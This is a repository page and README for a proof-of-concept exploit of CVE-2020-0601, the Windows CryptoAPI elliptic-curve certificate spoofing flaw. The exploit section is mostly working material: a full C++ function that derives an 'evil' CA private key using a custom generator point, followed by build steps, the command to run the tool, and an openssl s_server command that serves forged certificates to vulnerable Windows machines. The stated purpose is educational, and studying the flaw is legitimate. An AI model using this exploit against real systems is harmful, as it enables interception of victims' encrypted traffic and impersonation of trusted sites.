https://github.com/gremwell/cve-2020-0601_poc
CVE-2020-0601 proof of concept
https://github.com/gremwell/cve-2020-0601_poc
cryptopp cve-2020-0601 poc security ssl tls
Last synced: 3 months ago
JSON representation
CVE-2020-0601 proof of concept
- Host: GitHub
- URL: https://github.com/gremwell/cve-2020-0601_poc
- Owner: gremwell
- Created: 2020-02-18T16:36:49.000Z (about 5 years ago)
- Default Branch: master
- Last Pushed: 2020-02-19T08:46:36.000Z (about 5 years ago)
- Last Synced: 2025-01-10T17:53:17.868Z (4 months ago)
- Topics: cryptopp, cve-2020-0601, poc, security, ssl, tls
- Language: C++
- Size: 59.6 KB
- Stars: 1
- Watchers: 2
- Forks: 2
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Basic Info
The source code of this tool is supposed to help with understanding of CVE-2020-0601 vulnerability discovered in Windows Crypto API, see [CERT's overview](https://kb.cert.org/vuls/id/849224/).
The tool itself can be used to produce a certificate for an arbitrary domain which will be signed by an evil certificate authority. This tool produces evil CA with the same public key as the one provided on command line.
When a web browser of a vulnerable Windows build targets this certificate, it will be considered as the trusted one. Thus allows suitably positioned network-based attacker to intercept victim's traffic.
# Synopsis
Launch the tool providing path to a trusted Windows certificate:
```bash
./cve-2020-0601_poc ~/path/to/USERTrustECCCertificationAuthority.crt
```
In the example above a [USERTrust ECC Certification Authority](http://www.tbs-x509.com/USERTrustECCCertificationAuthority.crt) is used with the following public key:
```
04:1A:AC:54:5A:A9:F9:68:23:E7:7A:D5:24:6F:53:C6:5A:D8:4B:AB:C6:D5:B6:D1:E6:73:71:AE:DD:9C:D6:0C:61:FD:DB:A0:89:03:B8:05:14:EC:57:CE:EE:5D:3F:E2:21:B3:CE:F7:D4:8A:79:E0:A3:83:7E:2D:97:D0:61:C4:F1:99:DC:25:91:63:AB:7F:30:A3:B4:70:E2:C7:A1:33:9C:F3:BF:2E:5C:53:B1:5F:B3:7D:32:7F:8A:34:E3:79:79
```
The tool will save several certificates and keys in its current working directory:
```
test-cve_evil-ca.crt -- evil CA
test-cve_evil-privkey.key -- evil CA's private key in PEM format
test-cve_evil-privkey-pk8.key -- evil CA's private key in PKCS#8 format
test-cve_host-cert.crt -- target host's certificate (example.com by default)
test-cve_host-privkey.key -- target host's private key (example.com by default)
```
To test certificates launch `openssl s_server` as follows and redirect request towards it requests of https://example.com/ from your vulnerable Windows box:
```bash
sudo openssl s_server -cert test-cve_host-cert.crt -key test-cve_host-privkey.key -chainCAfile test-cve_evil-ca.crt -www -accept 443
```
Be sure that the original certificate is cached!
The result should look like this one:
# Build
`cmake` is used to generate make file to build this tool. As dependencies the following libraries are needed:
- openssl (> 1.0)
- cryptopp
Building:
```bash
mkdir build
cd build
cmake ..
make
```
# Description
Comprehensive (relatively) description at some point will be added to [Gremwell's website](https://www.gremwell.com/).
Start with looking at `main.cpp` file. It calls various OpenSSL wrappers which are important, but are not related to the vulnerability itself. The most interesting part is in `cve-2020-0601_poc.cpp` file:
```c++
bool craftEvilPrivKey(const char *caPubKeyRaw, size_t caPubKeyRawLen,
char *outEvilPrivKeyPKCS8, size_t maxSizePKCS8, size_t *outEvilPrivKeyPKCS8Len,
bool doSave, const char *evilPrivKeyFileName)
{
// load public key of the provided certificate into native CryptoPP type
DL_Keys_ECDSA::PublicKey caPubKey;
caPubKey.Load(CryptoPP::ArraySource((const CryptoPP::byte *)caPubKeyRaw,
caPubKeyRawLen, true).Ref());
// generate a private key using the same curve as in the provided CA certificate
CryptoPP::AutoSeededRandomPool prng;
DL_Keys_ECDSA::PrivateKey privKeyBase;
privKeyBase.Initialize(prng, caPubKey.GetGroupParameters());
// get the private key elliptic curve parameters
CryptoPP::Integer privKeyBaseExp = privKeyBase.GetPrivateExponent();
ECP privKeyBaseCurve = privKeyBase.GetGroupParameters().GetCurve();
CryptoPP::Integer privKeyBaseOrder = privKeyBase.GetGroupParameters().GetSubgroupOrder();
// calculate an inverse value of the private key
CryptoPP::Integer privKeyInverse = CryptoPP::EuclideanMultiplicativeInverse(privKeyBaseExp, privKeyBaseOrder);
// produce our custom generator (base point) as a multiplication of the inverse value of our private key
// and the public key of the provided CA certificate
ECP::Point caPubKeyQ = caPubKey.GetPublicElement();
ECP::Point evilG = privKeyBaseCurve.ScalarMultiply(caPubKeyQ, privKeyInverse);
// create an "evil" private key object using the base private's key exponent and curve but
// with our "evil" generator (base point)
DL_Keys_ECDSA::PrivateKey evilPrivKey;
evilPrivKey.Initialize(privKeyBaseCurve, evilG, privKeyBaseOrder, privKeyBaseExp);
// convert evil private key into PKCS8 format
CryptoPP::ArraySink evilPrivKeyPKCS8As((CryptoPP::byte *)outEvilPrivKeyPKCS8, maxSizePKCS8);
evilPrivKey.Save(evilPrivKeyPKCS8As.Ref());
*outEvilPrivKeyPKCS8Len = evilPrivKeyPKCS8As.TotalPutLength();
if (doSave) {
// save it as-is so this can be imported by some tools
evilPrivKey.Save(CryptoPP::FileSink(evilPrivKeyFileName).Ref());
}
// the code below converts the key to DER format
// however, as we have here our custom curve (not the "named" one), most of the
// tools are not able to properly import it. thus, leaving this code commented-out
#ifdef SUPPORT_DER_ENCODING
CryptoPP::ArraySink evilPrivKeyDerAs((CryptoPP::byte *)outEvilPrivKeyDer, maxSizeDer);
privKeyToDer(evilPrivKey, evilPrivKeyDerAs.Ref());
*outEvilPrivKeyDerLen = evilPrivKeyDerAs.TotalPutLength();
#endif
return true;
}
```
Comments here should be quite self-explanatory. :-)
# Acknowledgements
Thanks to [kudelskisecurity blog](https://research.kudelskisecurity.com/2020/01/15/cve-2020-0601-the-chainoffools-attack-explained-with-poc/) and references mentioned there.